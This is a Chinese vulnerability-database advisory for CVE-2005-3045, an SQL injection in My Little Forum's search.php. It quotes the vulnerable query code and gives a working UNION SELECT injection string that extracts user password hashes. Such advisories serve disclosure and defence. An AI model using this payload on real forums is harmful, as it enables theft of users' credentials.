漏洞信息详情
My Little Forum search.php远程SQL注入漏洞
- CNNVD编号:CNNVD-200509-235
- 危害等级: 高危
- CVE编号:
CVE-2005-3045
- 漏洞类型:
SQL注入
- 发布时间:
2005-09-23
- 威胁类型:
远程
- 更新时间:
2005-10-20
- 厂 商:
my_little_homepage - 漏洞来源:
rgod rgod@autistic… -
漏洞简介
my little forum是一套基于PHP和MySQL的互联网论坛应用程序。该应用程序采用传统树状视图展示信息,并支持图片上传、模板引擎、BB代码和表情符号等。
My Little Forum中存在SQL注入漏洞,成功利用这个漏洞的攻击者可以完全入侵基础数据库系统。
在search.php的第144行:
…
$result = mysql_query(\”SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \”.
$time_difference.\” HOUR,\’\’\”.$lang[\’\’time_format\’\’].\”\’\’) AS Uhrzeit,
DATE_FORMAT(time + INTERVAL \”.$time_difference.\” HOUR, \’\’\”.$lang[\’\’time_format\’\’].\”\’\’)
AS Datum, subject, name, email, hp, place, text, category FROM \”.$forum_table.\”
WHERE \”.$search_string.\” ORDER BY tid DESC, time ASC LIMIT \”.$ul.\”, \”
.$settings[\’\’search_results_per_page\’\’], $connid);
…
然后在搜索页面,选择\”phrase\”,然后键入:
[whatever]\\%\’\’ UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name=\’\'[username]\’\’ /*
由于没有过滤$searchstring变量,如果关闭了magic quote的话,就可以得到任何管理员/用户口令哈希。
1.6beta版也受漏洞影响:
…
$result = mysql_query(\”SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \
\”.$time_difference.\” HOUR) AS Uhrzeit, subject, name, email, hp, place, text, \
category FROM \”.$db_settings[\’\’forum_table\’\’].\” WHERE \”.$search_string.\” ORDER BY tid \
DESC, time ASC LIMIT \”.$ul.\”, \”.$settings[\’\’search_results_per_page\’\’], $connid);
…
在注入字符串中删除语句,可得到同样的结果
[whatever]\\%\’\’ UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name=\’\'[username]\’\’ /*
漏洞公告
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
参考网址
来源: BID
名称: 14908
链接:http://www.securityfocus.com/bid/14908
来源: SECUNIA
名称: 16913
链接:http://secunia.com/advisories/16913/
来源: MISC
链接:http://rgod.altervista.org/mylittle15_16b.html
来源: BUGTRAQ
名称: 20050922 My Little Forum 1.5 / 1.6beta SQL Injection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112741430006983&w=2